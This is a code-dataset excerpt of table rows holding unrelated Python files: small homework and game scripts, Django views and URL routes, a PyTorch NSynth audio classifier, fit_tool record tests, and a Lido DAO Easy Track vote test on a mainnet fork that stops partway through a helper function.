seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
6882747948 | # Строка содержит набор чисел. Показать большее и меньшее число. Символ-разделитель - пробел
def String_Min_and_Max(str):
    """Return (min, max) of the integers in a space-separated string.

    :param str: string of integers separated by single spaces
              (parameter name kept for backward compatibility even though
              it shadows the builtin)
    :return: tuple (smallest value, largest value)
    :raises ValueError: if any token is not a valid integer
    """
    # Convert every token once, then let the builtin min/max do the scan.
    # The original shadowed the builtins `min` and `max` with locals and
    # converted each element twice.
    numbers = [int(token) for token in str.split(' ')]
    return min(numbers), max(numbers)
# Read a space-separated list of integers from the user (prompt text is Russian).
a = input('Введите строку, состоящую из набора чисел. В качестве символа-разделителя используйте пробел ')
print(String_Min_and_Max(a)) | AlbertKhismatullin/Python_HomeWork | Task27.py | Task27.py | py | 681 | python | ru | code | 0 | github-code | 36 |
75312911145 | import matplotlib.pyplot as plt
from moisture_tracers import plotdir
from moisture_tracers.plot.figures.fig2_satellite_comparison import make_plot
def main():
    """Make the figure-4 satellite comparison on the Lagrangian grid and save it."""
    start_time = "20200201"
    grid = "lagrangian_grid"
    lead_times = [30, 36, 42, 48]
    resolutions = ["km1p1", "km2p2", "km4p4"]

    make_plot(start_time, grid, resolutions, lead_times)

    # Output filename encodes the start time and grid for traceability.
    filename = "fig4_satellite_comparison_{}_{}.png".format(start_time, grid)
    plt.savefig(plotdir + filename)
if __name__ == "__main__":
    # Suppress all Python warnings when run as a script.
    import warnings
    warnings.filterwarnings("ignore")
    main()
| leosaffin/moisture_tracers | moisture_tracers/plot/figures/fig4_satellite_comparison_lagrangian_grid.py | fig4_satellite_comparison_lagrangian_grid.py | py | 560 | python | en | code | 0 | github-code | 36 |
27140115657 | # -*- coding: utf-8 -*-
#######################
# deploy.urls
#######################
"""
1. 部署服务
2. add DNS
3. nginx设置
4. config check
5. 诊断
"""
from django.urls import path
from deploy import views
# Route table for the deploy app: health probe, deployment trigger,
# nginx/DNS setup, config check and diagnosis endpoints.
urlpatterns = [
    path('health/', views.health,name="health"),
    path('start/',views.deploy,name="deploy"),
    path('setNginx/<env>/<target>/<project>/',views.set_project_nginx,name="set_project_nginx"),
    path('addDNS/<env>/<project>/',views.add_project_dns,name="add_project_dns"),
    path('configCheck/<project>/',views.project_config_check,name="project_config_check"),
    path('diagnose/<project>/',views.diagnose_project,name="diagnose_project"),
]
| yuzhenduan/envDeploy | deploy/urls.py | urls.py | py | 691 | python | en | code | 0 | github-code | 36 |
14076203382 | import time
from turtle import Screen
from player import Player
from car_manager import CarManager
from scoreboard import Scoreboard
# SETUP SCREEN
screen = Screen()
screen.setup(width=600, height=600)
screen.bgcolor('black')
# tracer(0) disables automatic redraws; screen.update() below drives each frame.
screen.tracer(0)
# SETUP CARS, TURTLE, SCOREBORAD AND STREET BACKGROUND
car = CarManager()
turtle = Player()
score = Scoreboard()
score.draw_walls()
# ACTIVATE KEY FUNCTIONALITY
screen.listen()
screen.onkey(key='Up', fun=turtle.move)
screen.onkey(key='Down', fun=turtle.move_back)
# VARIABLE LOOP COUNTER
loop_count = 0
# RUN GAME ON WHILE LOOP
game_is_on = True
while game_is_on:
    time.sleep(0.1)
    screen.update()
    # SLOW DOWN CAR GENERATION GIVEN CAR LANES
    # Lanes spawn a car only every 12th (or 20th) tick so traffic stays sparse.
    if loop_count % 12 == 0:
        car.top_lane()
        car.top_center_lane()
        car.bottom_center_lane()
    if loop_count % 20 == 0:
        car.bottom_lane()
    # REGULATE CAR SPEEDS
    car.move_fast(30)
    car.move_regular(20)
    car.move_slow(10)
    car.move_super_slow(5)
    # COUNT LOOP
    loop_count += 1
    # TRACK EACH CAR'S INDIVIDUAL POSITION
    for item in range(len(car.master_list)):
        y = car.master_list[item].ycor()
        x = car.master_list[item].xcor()
        turtle_y = turtle.player.ycor()
        turtle_x = turtle.player.xcor()
        y_dif = y - turtle_y
        x_dif = x - turtle_x
        # ADD SCORE IF TURTLE REACHES OTHER SIDE OF THE HIGHWAY AND TAKE TURTLE BACK TO START
        if turtle_y == 250:
            score.increase_score()
            # NOTE(review): the intermediate goto hops presumably walk the turtle
            # around off-screen back to the start line -- confirm intent.
            turtle.player.goto(500, 250)
            turtle.player.goto(500, -250)
            turtle.player.goto(0, -250)
        # GAME OVER IF A COLLISION IS DETECTED
        # 20px box around the car counts as a hit.
        if -20 < y_dif < 20 and -20 < x_dif < 20:
            game_is_on = False
            score.game_over()
screen.exitonclick()
| rivelez65/turtle-crossing-arcade_OOP-Turtle | main.py | main.py | py | 1,803 | python | en | code | 1 | github-code | 36 |
2153986094 | from django.shortcuts import render
# Create your views here.
def func(request, num1, num2):
    """Render the calculator template with arithmetic results for num1 and num2."""
    if num2 == 0:
        # Division by zero: show a message instead of crashing.
        div = '계산할 수 없습니다.'
    else:
        div = num1 / num2

    context = {
        'num1': num1,
        'num2': num2,
        'sub': num1 - num2,
        'mul': num1 * num2,
        'div': div,
    }
    return render(request, 'calculators/calculator.html', context)
| ji-hyon/Web_study | Django/practice/part2_Django/django_2_2/project2/calculators/views.py | views.py | py | 406 | python | en | code | 0 | github-code | 36 |
14128946048 | #!/usr/local/bin/ python3
# -*- coding:utf-8 -*-
# __author__ = "zenmeder"
# Definition for a binary tree node.
class TreeNode(object):
    """Binary tree node holding a value and optional left/right children."""

    def __init__(self, x):
        # Children start empty; callers wire the tree up afterwards.
        self.val = x
        self.left = None
        self.right = None
class Solution(object):
    """Iterative binary-tree traversals."""

    def inorderTraversal(self, root):
        """Return node values in inorder (left, node, right) without recursion.

        :param root: root TreeNode, or None for an empty tree
        :return: list of node values
        """
        output = []
        pending = []
        node = root
        # Walk left pushing ancestors, then pop, record, and switch right.
        while pending or node:
            if node:
                pending.append(node)
                node = node.left
            else:
                node = pending.pop()
                output.append(node.val)
                node = node.right
        return output
# Build the tree 1 -(right)-> 2 -(left)-> 3 and print its inorder traversal.
# Expected output: [1, 3, 2]
a = TreeNode(1)
b = TreeNode(2)
c = TreeNode(3)
a.right = b
b.left = c
print(Solution().inorderTraversal(a))
| zenmeder/leetcode | 94.py | 94.py | py | 579 | python | en | code | 0 | github-code | 36 |
10197349809 | # nosetests --nocapture tests/test_record.py
import unittest
from fit_tool.definition_message import DefinitionMessage
from fit_tool.profile.messages.workout_step_message import WorkoutStepMessage
from fit_tool.record import RecordHeader, Record
class TestRecord(unittest.TestCase):
    """Round-trip (pack/unpack) tests for RecordHeader and Record byte encoding."""
    def shortDescription(self):
        # Returning None makes unittest/nose print the test *name* instead of
        # the first docstring line, which is easier to scan in test output.
        return None
    def test_normal_record_header(self):
        """Test packing and unpacking of normal record header.

        A header serialized and re-parsed must be byte-identical and equal.
        """
        expected_rh = RecordHeader(is_definition=True,
                                   local_id=RecordHeader.MAX_NORMAL_LOCAL_ID)
        bytes1 = expected_rh.to_bytes()
        rh = RecordHeader.from_bytes(bytes1)
        bytes2 = rh.to_bytes()
        self.assertEqual(bytes2, bytes1)
        self.assertEqual(rh, expected_rh)
    def test_compressed_timestamp_record_header(self):
        """Test packing and unpacking of a compressed timestamp header.
        """
        expected_rh = RecordHeader(is_time_compressed=True,
                                   local_id=3,
                                   time_offset_seconds=10)
        bytes1 = expected_rh.to_bytes()
        rh = RecordHeader.from_bytes(bytes1)
        bytes2 = rh.to_bytes()
        self.assertEqual(bytes2, bytes1)
    def test_record_pack_unpack(self):
        """Test packing and unpacking of a record

        Decoding requires the matching DefinitionMessage, keyed by local_id.
        """
        local_id = 15
        dm1 = WorkoutStepMessage(local_id=local_id)
        dm1.workout_step_name = 'test'
        record1 = Record.from_message(dm1)
        bytes1 = record1.to_bytes()
        definition_message = DefinitionMessage.from_data_message(dm1)
        record2 = Record.from_bytes(definition_messages={local_id: definition_message}, bytes_buffer=bytes1)
        bytes2 = record2.to_bytes()
        self.assertEqual(bytes2, bytes1)
    def test_record_to_row(self):
        """Test record to_row

        Smoke test only: prints the row, no assertion on its contents.
        """
        local_id = 15
        dm1 = WorkoutStepMessage(local_id=local_id)
        dm1.workout_step_name = 'test'
        record1 = Record.from_message(dm1)
        print(record1.to_row())
| soh55/python_fit_tool | fit_tool/tests/test_record.py | test_record.py | py | 2,080 | python | en | code | 0 | github-code | 36 |
import dotenv
import openai
import os
# Load OPENAI_API_KEY from a .env one directory up (path is relative to the CWD).
dotenv.load_dotenv('../.env')
openai.api_key = os.environ["OPENAI_API_KEY"]
# Ask the chat model a single one-shot question.
# NOTE(review): openai.ChatCompletion is the pre-1.0 SDK interface and was
# removed in openai>=1.0 -- confirm the pinned openai version for this repo.
response = openai.ChatCompletion.create(
    model="gpt-3.5-turbo",
    messages=[
        {"role": "user", "content": "tell me about gpt for social good"}
    ]
)
print(response["choices"][0]["message"]["content"]) | aiformankind/gpt-for-social-good | gpt/demo.py | demo.py | py | 330 | python | en | code | 0 | github-code | 36 |
71249335464 | """
NSynth classification using PyTorch
Authors: Japheth Adhavan, Jason St. George
Reference: Sasank Chilamkurthy <https://chsasank.github.io>
"""
import torch
import torch.nn as nn
import torch.optim as optim
from torch.optim import lr_scheduler
import numpy as np
import utils
import models
import data
import visualize
import time
import os
import argparse
import logging
logging.basicConfig(level=logging.INFO)
gpu_idx = utils.get_free_gpu()
device = torch.device("cuda:{}".format(gpu_idx))
logging.info("Using device cuda:{}".format(gpu_idx))
def train_model(model, dataloaders, criterion, optimizer, scheduler, network_type, num_epochs=10):
    """Train and validate `model`, checkpointing the best validation weights.

    :param model: torch.nn.Module already placed on the target device
    :param dataloaders: dict with "train" and "val" DataLoaders yielding
        (samples, labels, targets) batches
    :param criterion: loss function, e.g. nn.CrossEntropyLoss
    :param optimizer: optimizer over model.parameters()
    :param scheduler: LR scheduler, stepped once per training epoch
    :param network_type: network name used in the checkpoint filename
    :param num_epochs: number of epochs to run (default 10)
    :return: (model with best validation weights loaded,
              dict of per-epoch losses for "train" and "val")
    """
    import copy  # local import: only needed for weight snapshots

    since = time.time()

    # FIX: model.state_dict() returns *references* to the live parameter
    # tensors, so without a deep copy the saved "best" weights would silently
    # keep changing as training continues. Snapshot them instead.
    best_model_wts = copy.deepcopy(model.state_dict())
    best_acc = 0.0
    dataset_sizes = {x: len(dataloaders[x].dataset) for x in ["train", "val"]}
    model_loss = {x: [0 for _ in range(num_epochs)] for x in ["train", "val"]}
    for epoch in range(num_epochs):
        print('Epoch {}/{}'.format(epoch + 1, num_epochs))
        print('-' * 10)
        for phase in ['train', 'val']:
            if phase == 'train':
                scheduler.step()
                model.train()
            else:
                model.eval()
            running_loss = 0.0
            running_corrects = 0
            # iterate over data
            for batch_idx, (samples, labels, targets) in enumerate(dataloaders[phase]):
                inputs = samples.to(device)
                labels = labels.to(device)
                # zero the parameter gradients
                optimizer.zero_grad()
                # track gradients only while training
                with torch.set_grad_enabled(phase == 'train'):
                    outputs = model(inputs)
                    _, preds = torch.max(outputs, 1)
                    loss = criterion(outputs, labels)
                    # backward + optimize only if in training phase
                    if phase == 'train':
                        loss.backward()
                        optimizer.step()
                # aggregate statistics
                running_loss += loss.item() * inputs.size(0)
                running_corrects += torch.sum(preds == labels.data)
                if phase == 'train' and batch_idx % 50 == 0:
                    logging.info('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
                        (epoch + 1),
                        (batch_idx + 1) * len(samples),
                        dataset_sizes[phase],
                        100. * (batch_idx + 1) / len(dataloaders[phase]),
                        loss.item()))
            epoch_loss = running_loss / dataset_sizes[phase]
            epoch_acc = running_corrects.double() / dataset_sizes[phase]
            model_loss[phase][epoch] = epoch_loss
            logging.info('{} Loss: {:.4f} Acc: {:.4f}'.format(
                phase.capitalize(), epoch_loss, epoch_acc))
            # checkpoint the best weights seen so far (deep copy, see above)
            if phase == 'val' and epoch_acc > best_acc:
                best_acc = epoch_acc
                best_model_wts = copy.deepcopy(model.state_dict())
                torch.save(best_model_wts, "./models/{}Network.pt".format(network_type))
        print()
    time_elapsed = time.time() - since
    logging.info('Training completed in {:.0f}m {:.0f}s'.format(
        time_elapsed // 60, time_elapsed % 60))
    logging.info('Best overall val Acc: {:4f}'.format(best_acc))
    # load best model weights
    model.load_state_dict(best_model_wts)
    return model, model_loss
# def test(model, dataloader):
# spreads = [[0 for y in range(10)] for x in range(10)]
# test_c = [0 for x in range(10)]
# test_t = [0 for x in range(10)]
# c_done = [False for x in range(10)]
# i_done = [False for x in range(10)]
# c_samples, i_samples = 0, 0
# y_test, y_pred = [], []
#
# correct = (preds == labels).squeeze()
# np_predicted = preds.cpu().numpy() # Get vector of int class output labels
# y_pred.extend(np_predicted)
# y_test.extend(if_label.cpu().numpy())
#
# if i_samples < 10 and c_samples < 10:
# for i in range(len(outputs)):
# label = str(labels[i]) # e.g. 'tensor(0)'
# label = int(label[7]) # 0
# test_c[label] += correct[i].item()
# test_t[label] += 1
#
# if np_predicted[i] != label:
# spreads[label][np_predicted[i]] += 1
# if i_samples < 10:
# i_samples += visualize.save_samples(inputs[i],
# np_predicted[i], label,
# i_done, False, CLASS_NAMES)
# else:
# if c_samples < 10:
# c_samples += visualize.save_samples(inputs[i], None, label,
# c_done, True, CLASS_NAMES)
def test(model, test_loader, criterion, classes):
    """Evaluate `model` on the test set and collect confusion statistics.

    :param model: trained torch.nn.Module
    :param test_loader: DataLoader yielding (data, labels, target) items
    :param criterion: loss function used to accumulate test loss
    :param classes: ordered list of class names
    :return: (y_test, y_pred, spread, examples) where `spread` is a
        confusion-count matrix and `examples` stores one correct and one
        incorrect (data, predicted_label) sample per actual class
    """
    model.eval()
    test_loss = 0
    correct = 0
    no_of_classes = len(classes)
    # spread[actual][predicted] counts; examples[actual][is_correct] keeps one sample.
    spread = [([0] * no_of_classes) for _ in range(no_of_classes)]
    examples = [{} for _ in range(no_of_classes)]
    y_test, y_pred = [], []
    with torch.no_grad():
        # NOTE(review): `data` shadows the module-level `data` import; harmless
        # here but worth renaming.
        for data, labels, target in test_loader:
            data, labels = data.to(device), labels.to(device)
            output = model(data)
            test_loss += criterion(output, labels).item() # sum up batch loss
            pred = output.max(1, keepdim=True)[1] # get the index of the max log-probability
            actual = labels.view_as(pred)
            is_correct = pred.equal(actual)
            # NOTE(review): int(labels)/int(pred) assume batch_size == 1 -- confirm
            # the test loader configuration.
            # NOTE(review): labels >= 9 are clamped into bucket 9; verify this is
            # intended for the 3-class "Bonus" network as well.
            label_actual = int(labels) if int(labels) < 9 else 9
            label_pred = int(pred) if int(pred) < 9 else 9
            spread[label_actual][label_pred] += 1
            correct += 1 if is_correct else 0
            examples[label_actual][is_correct] = (data, label_pred)
            y_pred.append(label_pred)
            y_test.append(label_actual)
    test_loss /= len(test_loader.dataset)
    print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.2f}%)\n'.format(
        test_loss, correct, len(test_loader.dataset),
        100. * correct / len(test_loader.dataset)))
    return y_test, y_pred, spread, examples
def main(args):
    """Build the selected network and either train it or evaluate a saved model.

    :param args: parsed argparse namespace (see the __main__ block below)
    """
    # NOTE(review): np.warnings was removed in NumPy 1.24+; confirm the pinned
    # numpy version, otherwise use the stdlib `warnings` module directly.
    np.warnings.filterwarnings('ignore')
    os.makedirs("./graphs", exist_ok=True)
    os.makedirs("./models", exist_ok=True)
    # Dispatch table: network name -> model class, instantiated on `device`.
    model = {
        "Simple": models.SimpleNetwork,
        "Epic" : models.EpicNetwork,
        "Bonus" : models.BonusNetwork
    }[args.network]().to(device)
    classes = ['bass', 'brass', 'flute', 'guitar', 'keyboard',
               'mallet', 'organ', 'reed', 'string', 'vocal']
    # The Bonus network classifies source type instead of instrument family.
    if args.network == "Bonus":
        classes = ['acoustic', 'electronic', 'synthetic']
    model.double()
    criterion = nn.CrossEntropyLoss()
    optimizer_conv = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum)
    exp_lr_scheduler = lr_scheduler.StepLR(optimizer_conv, step_size=args.step, gamma=args.gamma)
    if not args.test:
        train_loader = data.get_data_loader("train", batch_size=args.batch_size,
                                            shuffle=True, num_workers=4, network=args.network)
        valid_loader = data.get_data_loader("valid", network=args.network)
        dataloaders = {
            "train": train_loader,
            "val": valid_loader
        }
        logging.info('Training...')
        model, model_loss = train_model(model, dataloaders,
                                        criterion, optimizer_conv,
                                        exp_lr_scheduler,
                                        args.network,
                                        num_epochs=args.epochs)
        visualize.plot_loss(model_loss, "{}Network".format(args.network))
    else:
        # Evaluation path: load the checkpoint written during training.
        logging.info('Testing...')
        model.load_state_dict(torch.load("./models/{}Network.pt".format(args.network)))
        test_loader = data.get_data_loader("test", network=args.network)
        y_test, y_pred, spreads, examples = test(model, test_loader, criterion, classes)
        visualize.plot_histograms(classes, spreads, type=args.network)
        visualize.plot_confusion_matrix(y_test, y_pred, classes, type=args.network)
        visualize.save_samples(examples, classes)
    logging.info('Completed Successfully!')
if __name__ == "__main__":
    # CLI entry point: parse hyperparameters and run training or testing.
    parser = argparse.ArgumentParser(description='NSynth classifier')
    parser.add_argument('--batch-size', type=int, default=64, metavar='N',
                        help='input batch size for training (default: 64)')
    parser.add_argument('--test', action='store_true', default=False,
                        help='disables training, loads model')
    parser.add_argument('--network', default='Epic', const='Epic', nargs="?", choices=['Simple', 'Epic', 'Bonus'],
                        help='Choose the type of network from Simple, Epic and Bonus (default: Epic)')
    parser.add_argument('--epochs', type=int, default=10, metavar='N',
                        help='number of epochs to train (default: 10)')
    parser.add_argument('--lr', type=float, default=0.01, metavar='LR',
                        help='learning rate (default: 0.01)')
    parser.add_argument('--momentum', type=float, default=0.5, metavar='M',
                        help='SGD momentum (default: 0.5)')
    parser.add_argument('--step', type=int, default=3, metavar='N',
                        help='number of epochs to decrease learn-rate (default: 3)')
    parser.add_argument('--gamma', type=float, default=0.1, metavar='N',
                        help='factor to decrease learn-rate (default: 0.1)')
main(parser.parse_args()) | ifrit98/NSynth_Classification_CNN | src/main.py | main.py | py | 9,785 | python | en | code | 1 | github-code | 36 |
5547407739 | """
Tests for voting 31/01/2023.
"""
from scripts.vote_2023_01_31 import start_vote
from brownie import chain, accounts
from brownie.network.transaction import TransactionReceipt
from eth_abi.abi import encode_single
from utils.config import network_name
from utils.test.tx_tracing_helpers import *
from utils.test.event_validators.easy_track import (
validate_evmscript_factory_added_event,
EVMScriptFactoryAdded,
validate_evmscript_factory_removed_event,
)
from utils.easy_track import create_permissions
from utils.agent import agent_forward
from utils.voting import create_vote, bake_vote_items
eth = "0x0000000000000000000000000000000000000000"
def test_vote(
    helpers,
    accounts,
    vote_id_from_env,
    bypass_events_decoding,
    unknown_person,
    interface,
    ldo_holder,
):
    """Acceptance test for the 2023-01-31 omnibus vote.

    Verifies on a mainnet fork that the vote (items 1-3) adds the Referral
    program DAI top-up / add-recipient / remove-recipient EasyTrack factories
    and (items 4-6) removes the old reWARDS factories, then exercises the new
    factories end to end and validates the emitted vote events.
    """
    dai_token = interface.ERC20("0x6B175474E89094C44Da98b954EedeAC495271d0F")
    # Whitelisted referral-program payout addresses (mainnet), impersonated.
    allowed_recipients = [
        accounts.at("0xaf8aE6955d07776aB690e565Ba6Fbc79B8dE3a5d", {"force": True}),
        accounts.at("0x558247e365be655f9144e1a0140D793984372Ef3", {"force": True}),
        accounts.at("0x53773E034d9784153471813dacAFF53dBBB78E8c", {"force": True}),
        accounts.at("0xC976903918A0AF01366B31d97234C524130fc8B1", {"force": True}),
        accounts.at("0x9e2b6378ee8ad2A4A95Fe481d63CAba8FB0EBBF9", {"force": True}),
        accounts.at("0x82AF9d2Ea81810582657f6DC04B1d7d0D573F616", {"force": True}),
        accounts.at("0x586b9b2F8010b284A0197f392156f1A7Eb5e86e9", {"force": True}),
        accounts.at("0x883f91D6F3090EA26E96211423905F160A9CA01d", {"force": True}),
        accounts.at("0x351806B55e93A8Bcb47Be3ACAF71584deDEaB324", {"force": True}),
        accounts.at("0xf6502Ea7E9B341702609730583F2BcAB3c1dC041", {"force": True}),
        accounts.at("0xDB2364dD1b1A733A690Bf6fA44d7Dd48ad6707Cd", {"force": True}),
        accounts.at("0xF930EBBd05eF8b25B1797b9b2109DDC9B0d43063", {"force": True}),
        accounts.at("0x6DC9657C2D90D57cADfFB64239242d06e6103E43", {"force": True}),
        accounts.at("0x13C6eF8d45aFBCcF15ec0701567cC9fAD2b63CE8", {"force": True}),
    ]
    finance = interface.Finance("0xB9E5CBB9CA5b0d659238807E84D0176930753d86")
    dao_voting = interface.Voting("0x2e59A20f205bB85a89C53f1936454680651E618e")
    easy_track = interface.EasyTrack("0xF0211b7660680B49De1A7E9f25C65660F0a13Fea")
    referral_dai_registry = interface.AllowedRecipientRegistry("0xa295C212B44a48D07746d70d32Aa6Ca9b09Fb846")
    referral_dai_topup_factory = interface.TopUpAllowedRecipients("0x009ffa22ce4388d2F5De128Ca8E6fD229A312450")
    referral_dai_add_recipient_factory = interface.AddAllowedRecipient("0x8F06a7f244F6Bb4B68Cd6dB05213042bFc0d7151")
    referral_dai_remove_recipient_factory = interface.RemoveAllowedRecipient("0xd8f9B72Cd97388f23814ECF429cd18815F6352c1")
    referral_program_multisig = accounts.at("0xe2A682A9722354D825d1BbDF372cC86B2ea82c8C", {"force": True})
    rewards_topup_factory_old = interface.IEVMScriptFactory("0x77781A93C4824d2299a38AC8bBB11eb3cd6Bc3B7")
    rewards_add_factory_old = interface.IEVMScriptFactory("0x9D15032b91d01d5c1D940eb919461426AB0dD4e3")
    rewards_remove_factory_old = interface.IEVMScriptFactory("0xc21e5e72Ffc223f02fC410aAedE3084a63963932")
    # Pre-vote state: 15 factories, new ones absent, old reWARDS ones present.
    old_factories_list = easy_track.getEVMScriptFactories()
    assert len(old_factories_list) == 15
    assert referral_dai_topup_factory not in old_factories_list
    assert referral_dai_add_recipient_factory not in old_factories_list
    assert referral_dai_remove_recipient_factory not in old_factories_list
    assert rewards_topup_factory_old in old_factories_list
    assert rewards_add_factory_old in old_factories_list
    assert rewards_remove_factory_old in old_factories_list
    ##
    ## START VOTE
    ##
    vote_id = vote_id_from_env or start_vote({"from": ldo_holder}, silent=True)[0]
    tx: TransactionReceipt = helpers.execute_vote(
        vote_id=vote_id, accounts=accounts, dao_voting=dao_voting, skip_time=3 * 60 * 60 * 24
    )
    # Post-vote state: 3 factories added, 3 removed -> still 15 in total.
    updated_factories_list = easy_track.getEVMScriptFactories()
    assert len(updated_factories_list) == 15
    # 1. Add Referral program DAI top up EVM script factory 0x009ffa22ce4388d2F5De128Ca8E6fD229A312450 to Easy Track
    assert referral_dai_topup_factory in updated_factories_list
    create_and_enact_payment_motion(
        easy_track,
        referral_program_multisig,
        referral_dai_topup_factory,
        dai_token,
        allowed_recipients,
        [10 * 10**18, 10 * 10**18, 10 * 10**18, 10 * 10**18, 10 * 10**18, 10 * 10**18, 10 * 10**18, 10 * 10**18, 10 * 10**18, 10 * 10**18, 10 * 10**18, 10 * 10**18,10 * 10**18, 10 * 10**18],
        unknown_person,
    )
    check_add_and_remove_recipient_with_voting(referral_dai_registry, helpers, ldo_holder, dao_voting)
    # 2. Add Referral program DAI add recipient EVM script factory 0x8F06a7f244F6Bb4B68Cd6dB05213042bFc0d7151 to Easy Track
    assert referral_dai_add_recipient_factory in updated_factories_list
    create_and_enact_add_recipient_motion(
        easy_track,
        referral_program_multisig,
        referral_dai_registry,
        referral_dai_add_recipient_factory,
        unknown_person,
        "",
        ldo_holder,
    )
    # 3. Add Referral program DAI remove recipient EVM script factory 0xd8f9B72Cd97388f23814ECF429cd18815F6352c1 to Easy Track
    assert referral_dai_remove_recipient_factory in updated_factories_list
    create_and_enact_remove_recipient_motion(
        easy_track,
        referral_program_multisig,
        referral_dai_registry,
        referral_dai_remove_recipient_factory,
        unknown_person,
        ldo_holder,
    )
    # 4. Remove reWARDS top up EVM script factory (old ver) 0x77781A93C4824d2299a38AC8bBB11eb3cd6Bc3B7 from Easy Track
    assert rewards_topup_factory_old not in updated_factories_list
    # 5. Remove reWARDS add recipient EVM script factory (old ver) 0x9D15032b91d01d5c1D940eb919461426AB0dD4e3 from Easy Track
    assert rewards_add_factory_old not in updated_factories_list
    # 6. Remove reWARDS remove recipient EVM script factory (old ver) 0xc21e5e72Ffc223f02fC410aAedE3084a63963932 from Easy Track
    assert rewards_remove_factory_old not in updated_factories_list
    # validate vote events
    assert count_vote_items_by_events(tx, dao_voting) == 6, "Incorrect voting items count"
    display_voting_events(tx)
    # Event decoding is unavailable on some networks / CI configurations.
    if bypass_events_decoding or network_name() in ("goerli", "goerli-fork"):
        return
    evs = group_voting_events(tx)
    validate_evmscript_factory_added_event(
        evs[0],
        EVMScriptFactoryAdded(
            factory_addr=referral_dai_topup_factory,
            permissions=create_permissions(finance, "newImmediatePayment")
            + create_permissions(referral_dai_registry, "updateSpentAmount")[2:],
        ),
    )
    validate_evmscript_factory_added_event(
        evs[1],
        EVMScriptFactoryAdded(
            factory_addr=referral_dai_add_recipient_factory,
            permissions=create_permissions(referral_dai_registry, "addRecipient"),
        ),
    )
    validate_evmscript_factory_added_event(
        evs[2],
        EVMScriptFactoryAdded(
            factory_addr=referral_dai_remove_recipient_factory,
            permissions=create_permissions(referral_dai_registry, "removeRecipient"),
        ),
    )
    validate_evmscript_factory_removed_event(evs[3], rewards_topup_factory_old)
    validate_evmscript_factory_removed_event(evs[4], rewards_add_factory_old)
    validate_evmscript_factory_removed_event(evs[5], rewards_remove_factory_old)
def _encode_calldata(signature, values):
    """ABI-encode `values` per `signature`; return a 0x-prefixed hex string."""
    encoded = encode_single(signature, values)
    return "0x" + encoded.hex()
def create_and_enact_payment_motion(
    easy_track,
    trusted_caller,
    factory,
    token,
    recievers,
    transfer_amounts,
    stranger,
):
    """Create a top-up EasyTrack motion, wait out the motion duration, enact
    it, and assert the recipient/agent balance deltas match the transfers.

    :param easy_track: EasyTrack contract
    :param trusted_caller: account allowed to create motions for `factory`
    :param factory: top-up EVM script factory
    :param token: token being transferred (or `eth` for ether)
    :param recievers: recipient accounts (spelling kept for compatibility)
    :param transfer_amounts: per-recipient amounts, same order as recievers
    :param stranger: arbitrary account used to enact the motion
    """
    # The DAO Agent is the payer; its balance must drop by the total sum.
    agent = accounts.at("0x3e40D73EB977Dc6a537aF587D48316feE66E9C8c", {"force": True})
    agent_balance_before = balance_of(agent, token)
    recievers_balance_before = [balance_of(reciever, token) for reciever in recievers]
    motions_before = easy_track.getMotions()
    recievers_addresses = [reciever.address for reciever in recievers]
    calldata = _encode_calldata("(address[],uint256[])", [recievers_addresses, transfer_amounts])
    tx = easy_track.createMotion(factory, calldata, {"from": trusted_caller})
    motions = easy_track.getMotions()
    assert len(motions) == len(motions_before) + 1
    # Fast-forward past the 72h motion duration so the motion is enactable.
    chain.sleep(60 * 60 * 24 * 3)
    chain.mine()
    easy_track.enactMotion(
        motions[-1][0],
        tx.events["MotionCreated"]["_evmScriptCallData"],
        {"from": stranger},
    )
    recievers_balance_after = [balance_of(reciever, token)for reciever in recievers]
    for i in range(len(recievers)):
        assert recievers_balance_after[i] == recievers_balance_before[i] + transfer_amounts[i]
    agent_balance_after = balance_of(agent, token)
    assert agent_balance_after == agent_balance_before - sum(transfer_amounts)
def balance_of(address, token):
    """Return `address`'s balance: native ether when `token` is the zero
    address sentinel (`eth`), otherwise the ERC-20 balance."""
    return address.balance() if token == eth else token.balanceOf(address)
def create_and_enact_add_recipient_motion(
    easy_track,
    trusted_caller,
    registry,
    factory,
    recipient,
    title,
    stranger,
):
    """Create an add-recipient EasyTrack motion, enact it after the 72h
    motion duration, and assert the registry gained exactly one recipient.
    """
    recipients_count = len(registry.getAllowedRecipients())
    assert not registry.isRecipientAllowed(recipient)
    motions_before = easy_track.getMotions()
    calldata = _encode_calldata("(address,string)", [recipient.address, title])
    tx = easy_track.createMotion(factory, calldata, {"from": trusted_caller})
    motions = easy_track.getMotions()
    assert len(motions) == len(motions_before) + 1
    # Fast-forward past the 72h motion duration so the motion is enactable.
    chain.sleep(60 * 60 * 24 * 3)
    chain.mine()
    easy_track.enactMotion(
        motions[-1][0],
        tx.events["MotionCreated"]["_evmScriptCallData"],
        {"from": stranger},
    )
    assert len(registry.getAllowedRecipients()) == recipients_count + 1
    assert registry.isRecipientAllowed(recipient)
def create_and_enact_remove_recipient_motion(
    easy_track,
    trusted_caller,
    registry,
    factory,
    recipient,
    stranger,
):
    """Create a remove-recipient EasyTrack motion, enact it after the 72h
    motion duration, and assert the registry lost exactly one recipient.
    """
    recipients_count = len(registry.getAllowedRecipients())
    assert registry.isRecipientAllowed(recipient)
    motions_before = easy_track.getMotions()
    calldata = _encode_calldata("(address)", [recipient.address])
    tx = easy_track.createMotion(factory, calldata, {"from": trusted_caller})
    motions = easy_track.getMotions()
    assert len(motions) == len(motions_before) + 1
    # Fast-forward past the 72h motion duration so the motion is enactable.
    chain.sleep(60 * 60 * 24 * 3)
    chain.mine()
    easy_track.enactMotion(
        motions[-1][0],
        tx.events["MotionCreated"]["_evmScriptCallData"],
        {"from": stranger},
    )
    assert len(registry.getAllowedRecipients()) == recipients_count - 1
    assert not registry.isRecipientAllowed(recipient)
def check_add_and_remove_recipient_with_voting(registry, helpers, ldo_holder, dao_voting):
    """Sanity-check that Aragon Voting (acting through the Agent) can still
    add and then remove a registry recipient directly, bypassing EasyTrack.
    """
    recipient_candidate = accounts[0]
    title = ""
    recipients_length_before = len(registry.getAllowedRecipients())
    assert not registry.isRecipientAllowed(recipient_candidate)
